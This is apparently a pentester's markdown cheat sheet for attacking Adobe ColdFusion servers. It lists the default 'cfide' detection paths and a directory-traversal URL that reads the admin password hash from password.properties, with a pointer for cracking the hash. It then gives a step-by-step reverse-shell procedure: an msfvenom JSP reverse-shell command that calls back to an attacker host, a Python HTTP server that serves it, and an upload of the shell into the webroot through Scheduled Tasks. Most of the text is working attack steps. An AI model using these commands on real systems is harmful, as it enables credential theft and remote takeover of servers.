Skip to content

Latest commit

 

History

History
61 lines (44 loc) · 1.82 KB

Adobe ColdFusion.md

File metadata and controls

61 lines (44 loc) · 1.82 KB

Adobe ColdFusion

Detection of ColdFusion

The default path contain 'cfide'

http://10.0.0.1/cfide/images
http://10.0.0.1/cfide/scripts
http://10.0.0.1/cfide/administrator
http://10.0.0.1/cfide/classes
http://10.0.0.1/cfide/debug
http://10.0.0.1/cfide/wizards

Adobe Coldfusion 8 - Directory traversal

Searchsploit : multiple/remote/14641.py

➤ 1. Extract the hash of the password
http://10.0.0.1/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColfFusion8/lib/password.properties%00en
Exemple : password=AAFDC23870ECBCD3D557B6423A8982134E17927E

➤ 2. Crack the hash (sha1)
https://crackstation.net

Adobe Coldfusion - Reverse shell using 'Scheduled Tasks'

➤ 1. Connection to the interface
http://10.0.0.1/CFIDE/administrator/index.cfm

➤ 2. Create a java reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.194 LPORT=443 -f raw > exploit.jsp

➤ 3. Create a HTTP server in order to download the reverse shell
python3 -m http.server

➤ 4. Detect the mappings
From the menu, go to 'Server Settings' then 'Mappings'. In the 'Active ColdFusion Mappings', retain the directory path.
Ex: C:\Inetpub\wwwroot\CFIDE

➤ 5. Upload the reverse shell
From the menu, go to 'Debugging & Logging' then 'Scheduled Tasks'. Finally complete the information as listed below: 
• Taskname : Name of the task
• Frequency : One time (executed one time)
• URL : Local http url where the exploit is located
• Publish : Selected
• File: The path discover in the mapping part and the name of the exploit (ex: C:\Inetpub\wwwroot\CFIDE\exploit.jsp)

• The screenshot below provide an example
![image](https://user-images.githubusercontent.com/96211250/155032308-c37d19c7-202a-4708-b830-954b41d150ea.png)

➤ 6. Click on submit

➤ 7. Browse the exploit path
http://10.0.0.1/CFIDE/exploit.jsp